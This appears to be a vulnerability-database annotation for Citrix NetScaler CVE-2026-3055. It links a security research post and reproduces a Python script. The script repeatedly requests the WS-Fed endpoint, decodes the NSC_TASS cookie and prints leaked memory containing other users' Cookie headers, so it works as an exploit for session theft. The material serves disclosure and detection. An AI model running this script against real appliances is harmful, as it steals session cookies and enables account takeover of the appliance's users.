Please, We Beg, Just One Weekend Free Of Appliances (Citrix NetScaler CVE-2026-3055 Memory Overread Part 2)

Created on 2026-03-30 06:20, updated on 2026-03-30 06:20, by sync_user
JSON CVE-2026-3055
vulnerability:information=annotation

For more details -> https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/

which includes 

import base64

import requests
import urllib3

urllib3.disable_warnings()

BANNER = """             __         ___  ___________                   
     __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________ 
     \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
      \\     / / __ \\|  | \\  \\___|   Y  |    |(  <_> \\     / |  | \\/
       \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|   
                  \\/          \\/     \\/                            

watchTowr-vs-Citrix-NetScaler-CVE-2026-3055.py
(*) Citrix NetScaler Memory Overread Detection Artifact Generator - Aliz Hammond of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-3055]
"""

print(BANNER)

while True:
    try:
        resp = requests.get("https://<host>/wsfed/passive?wctx", verify=False, allow_redirects=False)
        tass = resp.cookies.get('NSC_TASS', None)
        if tass is None:
            continue
        tassText = base64.b64decode(tass)
        memIdx = tassText.find(b'wctx=')
        if memIdx != -1:
            bled = tassText[memIdx+5:]
            cookiePos = bled.find(b'Cookie')
            if cookiePos != -1:
                print(bled[cookiePos:].decode('ascii', errors='ignore'))
    except Exception:
        pass
Related vulnerabilities
Meta
[
  {
    "tags": [
      "vulnerability:information=annotation"
    ]
  }
]